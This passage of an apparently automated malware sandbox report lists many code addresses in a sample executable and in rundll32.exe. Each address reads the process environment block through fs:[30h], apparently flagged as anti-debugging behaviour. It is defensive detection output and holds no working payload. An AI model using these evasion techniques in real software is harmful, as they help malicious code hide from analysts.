          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
